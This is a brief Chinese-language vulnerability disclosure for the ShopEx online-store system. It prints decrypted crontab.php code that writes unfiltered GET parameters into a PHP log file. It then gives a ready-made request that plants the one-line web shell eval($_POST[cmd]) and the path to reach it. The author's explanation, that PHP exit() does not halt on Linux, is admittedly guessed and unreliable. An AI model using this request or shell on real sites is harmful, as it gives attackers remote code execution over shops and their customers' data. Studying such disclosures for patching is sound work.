|
ShopEx网店系统销售平台,是国内最早的网店软件提供商之一;是目前国内网店系统持续研发最久的公司;是目前网店软件国内市场占有率最高的软件提供商;是目前网店软件行业内规模最大的公司。
漏洞描述:crontab.php变量未进行严格过滤,发现linux的对php exit()不会退出,继续往下执行。于是漏洞产生了。
漏洞代码:
coreinclude_v5crontab.php zend加密后的,我只发布解密后的代码。
public function run( )
{
$this->logFile = HOME_DIR."/logs/access.log.php";
$this->now = time( );
$this->viewStat( );
$messenger =& $this->loadModel( "system/messenger" );
$messenger->runQueue( );
}
public function viewStat( )
{
if ( !file_exists( $this->logFile ) )
{
file_put_contents( $this->logFile, "#<?php exit()?>
" ); //囧之处!By:小翔
}
if ( isset( $_GET[action] ) )
{
error_log( $this->now." ".$_GET[action]." ".$_GET[p]."
", 3, $this->logFile );//没有任何过滤,
漏洞利用:
不知道原理,只测试了几个站,发现linux的对php exit()不会退出,继续往下执行。于是漏洞产生了。
直接提交:http://127.0.0.1/shopex/?cron=1&action=1&p=1<?php%20eval($_POST[cmd])?>
一句话在:http://127.0.0.1/shopex/home/logs/access.log.php
|
